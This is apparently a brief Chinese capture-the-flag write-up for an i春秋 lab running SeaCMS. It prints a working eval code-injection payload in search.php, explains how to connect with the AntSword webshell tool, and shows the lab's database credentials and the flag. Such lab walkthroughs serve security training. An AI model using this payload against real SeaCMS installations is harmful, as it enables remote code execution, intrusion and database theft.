i春秋-Test

题目


解题

参考WP

复制代码
https://blog.csdn.net/qq_40654505/article/details/107142533/

目录扫描

复现wp

payload为:

复制代码
search.php?searchtype=5&tid=&area=eval($_POST[cmd])

使用蚁剑连接

复制代码
http://eci-2ze4iyhwj7xvb68bsb2t.cloudeci1.ichunqiu.com:80/search.php?searchtype=5&tid=&area=eval($_POST[cmd])

cmd

找到数据库配置文件,/var/www/html/data/common.inc.php

复制代码
<?php
//数据库连接信息
$cfg_dbhost = '127.0.0.1';
$cfg_dbname = 'seacms';
$cfg_dbuser = 'sea_user';
$cfg_dbpwd = '46e06533407e';
$cfg_dbprefix = 'sea_';
$cfg_db_language = 'utf8';
?>

鼠标右击这条shell,选择数据操作,添加上面的数据库用户名和密码连接数据库


复制代码
flag{d2317097-0b48-4bbc-a968-90ec76ac67ea}
相关推荐
Suckerbin16 分钟前
LAMPSecurity: CTF5靶场渗透
笔记·安全·web安全·网络安全
不老刘1 小时前
行为式验证码技术解析:滑块拼图、语序选词与智能无感知
网络安全·验证码·行为式验证码
李白你好2 小时前
CyberPoC 是一个现代化的网络安全练习和竞赛平台,支持容器化部署的安全挑战,为用户提供实践网络安全技能的环境。
web安全
房屋安全鉴定检测6 小时前
房屋安全鉴定报告有效期多久
安全·网络安全
心 一6 小时前
Web安全基石:深入理解与防御SQL注入漏洞
sql·安全·web安全
房屋安全鉴定检测8 小时前
房屋安全鉴定需要什么条件
安全·网络安全
FLS16810 小时前
Kali搭建sqli-labs靶场
linux·sql·安全·网络安全
不是三毛没有半10 小时前
华为USG6000v2 NAT模式下IPSEC IKE V1 实验
网络·网络安全·华为
KKKlucifer11 小时前
网络安全等级保护:等级保护工作、分级保护工作、密码管理工作三者之间的关系
网络·安全·web安全
Suckerbin13 小时前
LAMPSecurity: CTF6靶场渗透
笔记·安全·web安全·网络安全